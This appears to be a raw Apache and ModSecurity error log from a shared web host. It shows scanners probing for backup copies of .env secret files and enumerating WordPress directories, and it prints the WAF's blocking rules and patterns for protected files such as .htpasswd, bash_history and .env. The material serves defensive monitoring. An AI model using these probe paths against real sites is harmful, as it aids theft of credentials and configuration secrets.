[Tue May 26 16:41:12.983375 2026] [security2:error] [pid 817651:tid 817790] [client 208.84.100.196:8080] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.local.old"] [unique_id "ahV_0NlGRCPPN1dS2y2pNAAAAI4"]
[Tue May 26 16:41:12.983375 2026] [security2:error] [pid 817651:tid 817856] [client 208.84.100.196:8136] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.production.bak"] [unique_id "ahV_0NlGRCPPN1dS2y2pOQAAANA"]
[Tue May 26 16:41:12.983411 2026] [security2:error] [pid 817651:tid 817891] [client 208.84.100.196:7982] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.bak"] [unique_id "ahV_0NlGRCPPN1dS2y2pLwAAAPM"]
[Tue May 26 16:41:12.983522 2026] [security2:error] [pid 823496:tid 823652] [client 208.84.100.196:8148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.production.backup"] [unique_id "ahV_0Ja08mrtyBNpA4PBLAAAABg"]
[Tue May 26 16:41:12.983899 2026] [security2:error] [pid 817651:tid 817819] [client 208.84.100.196:8110] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.local.swp"] [unique_id "ahV_0NlGRCPPN1dS2y2pNQAAAKs"]
[Tue May 26 16:41:12.984116 2026] [security2:error] [pid 817651:tid 817806] [client 208.84.100.196:8000] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.backup"] [unique_id "ahV_0NlGRCPPN1dS2y2pMAAAAJ4"]
[Tue May 26 16:41:12.984705 2026] [security2:error] [pid 817651:tid 817850] [client 208.84.100.196:8104] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.local~"] [unique_id "ahV_0NlGRCPPN1dS2y2pNwAAAMo"]
[Tue May 26 16:41:12.985142 2026] [security2:error] [pid 817651:tid 817867] [client 208.84.100.196:8048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.orig"] [unique_id "ahV_0NlGRCPPN1dS2y2pQQAAANs"]
[Tue May 26 16:41:12.985155 2026] [security2:error] [pid 817651:tid 817829] [client 208.84.100.196:8176] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.production.orig"] [unique_id "ahV_0NlGRCPPN1dS2y2pQAAAALU"]
[Tue May 26 16:41:12.985845 2026] [security2:error] [pid 823496:tid 823646] [client 208.84.100.196:8174] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.production.swp"] [unique_id "ahV_0Ja08mrtyBNpA4PBLgAAABI"]
[Tue May 26 16:41:12.986000 2026] [security2:error] [pid 817651:tid 817868] [client 208.84.100.196:8026] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env~"] [unique_id "ahV_0NlGRCPPN1dS2y2pMgAAANw"]
[Tue May 26 16:41:12.986716 2026] [security2:error] [pid 823496:tid 823651] [client 208.84.100.196:8120] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.local.orig"] [unique_id "ahV_0Ja08mrtyBNpA4PBLwAAABc"]
[Tue May 26 16:41:12.987371 2026] [security2:error] [pid 817651:tid 817900] [client 208.84.100.196:7998] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.old"] [unique_id "ahV_0NlGRCPPN1dS2y2pMQAAAPw"]
[Tue May 26 16:41:12.987462 2026] [security2:error] [pid 817651:tid 817824] [client 208.84.100.196:7964] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.local.copy"] [unique_id "ahV_0NlGRCPPN1dS2y2pQgAAALA"]
[Tue May 26 16:41:12.988817 2026] [security2:error] [pid 823496:tid 823649] [client 208.84.100.196:8062] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webdisk.ucdc.co.in"] [uri "/___proxy_subdomain_webdisk/.env.copy"] [unique_id "ahV_0Ja08mrtyBNpA4PBLQAAABU"]
[Tue May 26 16:41:12.995720 2026] [core:error] [pid 823496:tid 823686] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:12.995737 2026] [core:error] [pid 823496:tid 823686] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:12.996088 2026] [core:error] [pid 817651:tid 817845] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:12.996099 2026] [core:error] [pid 817651:tid 817845] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:12.998454 2026] [core:error] [pid 817651:tid 817826] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:12.998467 2026] [core:error] [pid 817651:tid 817826] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:12.998640 2026] [core:error] [pid 823496:tid 823676] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:12.998656 2026] [core:error] [pid 823496:tid 823676] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:12.999274 2026] [core:error] [pid 817651:tid 817833] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:12.999284 2026] [core:error] [pid 817651:tid 817833] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:12.999470 2026] [core:error] [pid 817651:tid 817830] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:12.999491 2026] [core:error] [pid 817651:tid 817830] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:13.229445 2026] [autoindex:error] [pid 817651:tid 817878] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:13.230105 2026] [security2:error] [pid 817651:tid 817878] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_0dlGRCPPN1dS2y2pSgAAAOY"]
[Tue May 26 16:41:13.235030 2026] [security2:error] [pid 823496:tid 823682] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/uploads/"] [unique_id "ahV_0Za08mrtyBNpA4PBNwAAADY"]
[Tue May 26 16:41:13.412483 2026] [autoindex:error] [pid 823496:tid 823692] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:13.413180 2026] [security2:error] [pid 823496:tid 823692] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_0Za08mrtyBNpA4PBPgAAAEA"]
[Tue May 26 16:41:13.413537 2026] [security2:error] [pid 823496:tid 823689] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/"] [unique_id "ahV_0Za08mrtyBNpA4PBPAAAAD0"]
[Tue May 26 16:41:13.606392 2026] [autoindex:error] [pid 823496:tid 823712] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:13.607041 2026] [security2:error] [pid 823496:tid 823712] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_0Za08mrtyBNpA4PBQQAAAFQ"]
[Tue May 26 16:41:13.607418 2026] [security2:error] [pid 823496:tid 823703] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/css/"] [unique_id "ahV_0Za08mrtyBNpA4PBPwAAAEs"]
[Tue May 26 16:41:13.803034 2026] [autoindex:error] [pid 823496:tid 823711] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:13.803776 2026] [security2:error] [pid 823496:tid 823711] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_0Za08mrtyBNpA4PBRwAAAFM"]
[Tue May 26 16:41:13.804103 2026] [security2:error] [pid 823496:tid 823710] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/ID3/"] [unique_id "ahV_0Za08mrtyBNpA4PBRQAAAFI"]
[Tue May 26 16:41:13.859565 2026] [core:error] [pid 823496:tid 823693] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:13.859594 2026] [core:error] [pid 823496:tid 823693] [client 208.84.100.196:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:41:14.015033 2026] [autoindex:error] [pid 823496:tid 823720] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:14.015787 2026] [security2:error] [pid 823496:tid 823720] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_0Za08mrtyBNpA4PBTQAAAFw"]
[Tue May 26 16:41:14.016196 2026] [security2:error] [pid 823496:tid 823718] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/IXR/"] [unique_id "ahV_0Za08mrtyBNpA4PBSwAAAFo"]
[Tue May 26 16:41:14.217235 2026] [autoindex:error] [pid 817651:tid 817823] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:14.217985 2026] [security2:error] [pid 817651:tid 817823] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_0tlGRCPPN1dS2y2pWQAAAK8"]
[Tue May 26 16:41:14.218441 2026] [security2:error] [pid 823496:tid 823732] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/Requests/"] [unique_id "ahV_0pa08mrtyBNpA4PBWQAAAGg"]
[Tue May 26 16:41:14.419795 2026] [autoindex:error] [pid 817651:tid 817889] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:14.420449 2026] [security2:error] [pid 817651:tid 817889] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_0tlGRCPPN1dS2y2pXQAAAPE"]
[Tue May 26 16:41:14.420934 2026] [security2:error] [pid 823496:tid 823744] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/SimplePie/"] [unique_id "ahV_0pa08mrtyBNpA4PBXwAAAHQ"]
[Tue May 26 16:41:14.627921 2026] [security2:error] [pid 817651:tid 817895] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_z9lGRCPPN1dS2y2pGgAAAPc"]
[Tue May 26 16:41:14.632173 2026] [autoindex:error] [pid 817651:tid 817790] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/Text/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:14.633194 2026] [security2:error] [pid 817651:tid 817790] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_0tlGRCPPN1dS2y2pZAAAAI4"]
[Tue May 26 16:41:14.633704 2026] [security2:error] [pid 823496:tid 823746] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/Text/"] [unique_id "ahV_0pa08mrtyBNpA4PBYgAAAHY"]
[Tue May 26 16:41:15.819504 2026] [security2:error] [pid 823496:tid 823664] [client 195.178.110.34:35238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/new/.env"] [unique_id "ahV_05a08mrtyBNpA4PBcgAAACQ"]
[Tue May 26 16:41:15.939512 2026] [security2:error] [pid 823496:tid 823738] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_0pa08mrtyBNpA4PBZgAAAG4"]
[Tue May 26 16:41:15.939550 2026] [security2:error] [pid 823496:tid 823738] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_0pa08mrtyBNpA4PBZgAAAG4"]
[Tue May 26 16:41:15.940922 2026] [security2:error] [pid 823496:tid 823739] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/mu-plugins-old/"] [unique_id "ahV_0pa08mrtyBNpA4PBZQAAAG8"]
[Tue May 26 16:41:16.346410 2026] [security2:error] [pid 823496:tid 823651] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_1Ja08mrtyBNpA4PBdwAAABc"]
[Tue May 26 16:41:16.346441 2026] [security2:error] [pid 823496:tid 823651] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_1Ja08mrtyBNpA4PBdwAAABc"]
[Tue May 26 16:41:16.347100 2026] [security2:error] [pid 823496:tid 823652] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/themes/classic/inc/"] [unique_id "ahV_1Ja08mrtyBNpA4PBdQAAABg"]
[Tue May 26 16:41:16.630661 2026] [security2:error] [pid 823496:tid 823678] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_1Ja08mrtyBNpA4PBegAAADI"]
[Tue May 26 16:41:16.630682 2026] [security2:error] [pid 823496:tid 823678] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_1Ja08mrtyBNpA4PBegAAADI"]
[Tue May 26 16:41:16.641199 2026] [security2:error] [pid 823496:tid 823677] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/plugins/ninja-forms/"] [unique_id "ahV_1Ja08mrtyBNpA4PBeQAAADE"]
[Tue May 26 16:41:16.872898 2026] [security2:error] [pid 823496:tid 823670] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_1Ja08mrtyBNpA4PBfQAAACo"]
